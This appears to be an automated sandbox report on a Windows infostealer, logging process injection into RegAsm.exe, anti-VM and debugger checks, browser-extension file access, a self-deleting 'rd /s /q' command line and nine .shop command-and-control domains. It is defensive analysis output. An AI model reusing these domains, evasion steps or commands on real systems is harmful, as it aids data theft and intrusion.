                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 8.8 %
                Source: C:\Users\user\Desktop\file.exe TID: 5228Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exe TID: 5084Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1272Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exe TID: 5408Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exe TID: 4080Thread sleep count: 90 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00413540 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,2_2_00413540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B969 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040B969
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041425C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_0041425C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00413B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_00413B50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409B68 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_00409B68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040AB08 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040AB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409317 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00409317
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_004013B4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409645 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00409645
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A2C1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040A2C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00413EA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00413EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,12_2_004013B4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041391C GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,2_2_0041391C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040EA64 GetSystemInfo,wsprintfA,2_2_0040EA64
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                Source: Amcache.hve.19.drBinary or memory string: VMware
                Source: Amcache.hve.19.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.19.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.19.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.19.drBinary or memory string: VMware20,1hbin@
                Source: RegAsm.exe, 00000009.00000002.2376623871.0000000001025000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW("
                Source: Amcache.hve.19.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.19.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.19.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2376623871.000000000105A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.000000000130C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Amcache.hve.19.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.19.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: RegAsm.exe, 00000009.00000002.2376623871.000000000105A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_
                Source: Amcache.hve.19.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.19.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.19.drBinary or memory string: vmci.sys
                Source: Amcache.hve.19.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.19.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.19.drBinary or memory string: \driver\vmci,\driver\pci
                Source: RegAsm.exe, 0000000C.00000002.2377742353.00000000012AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                Source: Amcache.hve.19.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.19.drBinary or memory string: VMware20,1
                Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.19.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.19.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: RegAsm.exe, 0000000C.00000002.2377742353.00000000012AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: Amcache.hve.19.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.19.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.19.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.19.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.19.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.19.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.19.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-91667
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-93039
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043C800 LdrInitializeThunk,9_2_0043C800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041AD5F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041AD5F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041616A GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0041616A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415E38 mov eax, dword ptr fs:[00000030h]2_2_00415E38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B042 strtok_s,GetProcessHeap,HeapAlloc,StrStrA,lstrlenA,StrStrA,lstrlenA,StrStrA,lstrlenA,StrStrA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,strtok_s,lstrlenA,memset,2_2_0040B042
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041C8F8 SetUnhandledExceptionFilter,2_2_0041C8F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041AD5F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041AD5F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041A724 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0041A724
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6C0FB66C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C0FB1F7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2AAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C2AAC62
                Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5356, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4960, type: MEMORYSTR
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                Contains functionality to inject code into remote processes
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C12481 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_02C12481
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                LummaC encrypted strings found
                Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: caffegclasiqwp.shop
                Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stamppreewntnq.shop
                Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stagedchheiqwo.shop
                Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: millyscroqwp.shop
                Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: evoliutwoqm.shop
                Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: condedqpwqm.shop
                Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: traineiwnqo.shop
                Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: locatedblsoqp.shop
                Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: awwardwiqi.shop
                Searches for specific processes (likely to inject)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FD2A _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_0040FD2A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FE05 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_0040FE05
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63B000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63C000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9C0008Jump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000Jump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000Jump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000Jump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DD1008Jump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000Jump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000Jump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63B000Jump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63C000Jump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1194008Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\KKJEBAAECB.exe "C:\ProgramData\KKJEBAAECB.exe" Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\KJKJJJECFI.exe "C:\ProgramData\KJKJJJECFI.exe" Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJECFIECBGDG" & exitJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2F4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,2_2_6C2F4760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401000 cpuid 2_2_00401000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_0040E910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeQueries volume information: C:\ProgramData\KKJEBAAECB.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeQueries volume information: C:\ProgramData\KJKJJJECFI.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040E863 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,2_2_0040E863
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040E7F6 GetProcessHeap,HeapAlloc,GetUserNameA,2_2_0040E7F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040E8BD GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_0040E8BD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
